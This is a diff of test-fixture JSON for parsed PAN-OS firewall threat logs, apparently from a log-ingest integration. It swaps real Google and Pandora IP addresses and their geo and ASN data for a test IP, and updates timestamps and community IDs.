@@ -12715,15 +12725,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545980911Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079524900Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -12746,23 +12756,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -12778,7 +12790,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12819,7 +12831,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5z6QdMj01RaYM1NdZtQSRQgE9gk=", + "community_id": "1:CSr3gOfGhxc2481kFidqrVh2b1o=", "transport": "tcp", "application": "google-analytics", "direction": "inbound" 
@@ -12855,14 +12867,14 @@ ], "ip": [ "192.168.0.2", - "74.125.224.201", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545987966Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079531Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -12899,25 +12911,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -12958,7 +12972,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ut9W+vlgpMAH7M4p87nZ/gF7zO8=", + "community_id": "1:y8Rri5paZwSUjfuP8OCSj7AGTaw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -12993,15 +13007,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545996693Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079536600Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13038,25 +13052,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13097,7 +13113,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MNjszUBgbVupAxKdr7W7OIvU2lo=", + "community_id": "1:VbV334KW3Is9ozPo/GT616Kmfs8=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -13132,15 +13148,15 @@ "picard" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546007615Z", - "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079542200Z", + "original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -13163,23 +13179,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40428, + "number": 4837, "organization": { - "name": "Pandora Media, Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.85.40.48" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -13195,7 +13213,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13236,7 +13254,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PzMJQoALQDxnDaqwOEEz4zxyhHU=", + "community_id": "1:hWRgBF3xOOzQR0p2sUrnCEIRsLc=", "transport": "tcp", "application": "pandora", "direction": "inbound" 
@@ -13272,14 +13290,14 @@ ], "ip": [ "192.168.0.2", - "208.85.40.48", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546020198Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079547800Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,\"internal-tuner.pandora.com\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13316,25 +13334,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, - "message": "74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13375,7 +13395,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ThkQfWduH5PZoI7qa/R4rWqT2VM=", + "community_id": "1:5goyhqr2B6bgLWsDzxl1OgXk8mQ=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -13410,15 +13430,15 @@ "jordy" ], "ip": [ - "74.125.224.201", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546028626Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079553600Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13455,25 +13475,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.201" + "ip": "175.16.199.1" }, - "message": "74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13514,7 +13536,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Fd/TWc6RIS9q2bsgzztXrAAL4Ek=", + "community_id": "1:y4JV3O9OSznWA8cTxHb1krRrj2U=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -13549,15 +13571,15 @@ "jordy" ], "ip": [ - "74.125.224.201", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546036048Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079559200Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13594,25 +13616,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13653,7 +13677,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7gqxhjxtnxyQnsvGukcI+WZWzAY=", + "community_id": "1:Aa48sm/4uPjGhcG+b/Uf7cDELks=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -13688,15 +13712,15 @@ "jordy" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546043231Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079565Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13733,25 +13757,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13792,7 +13818,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZzHOd7AFzjbGqVCj9S3bTNHFX4Q=", + "community_id": "1:+Fw7pXGMYsoIHJl6XCvpSnc+ktw=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -13827,15 +13853,15 @@ "jordy" ], "ip": [ - "74.125.224.200", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546050389Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079568400Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -13872,25 +13898,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.198" + "ip": "175.16.199.1" }, - "message": "74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -13931,7 +13959,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uH37XIov0Sgv5kARW8dP9vrOs7w=", + "community_id": "1:1Gs2F0v1jt3hXj1u3g2EOeRAzcQ=", "transport": "tcp", "application": "google-analytics", "direction": "outbound" 
@@ -13966,15 +13994,15 @@ "jordy" ], "ip": [ - "74.125.224.198", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.546057533Z", - "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079572800Z", + "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -14011,25 +14039,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "74.125.224.200" + "ip": "175.16.199.1" }, - "message": "74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -14070,7 +14100,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9jnjFXERN6VFakI1U/qwzyqifzg=", + "community_id": "1:JXDqxOKk8OSmF1oSccqMIKzY9uk=", "transport": "tcp", "application": "google-maps", "direction": "outbound" 
@@ -14105,15 +14135,15 @@
 "jordy"
 ],
 "ip": [
- "74.125.224.200",
+ "175.16.199.1",
 "192.168.0.2",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.546064650Z",
- "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "ingested": "2021-12-09T13:42:59.079577900Z",
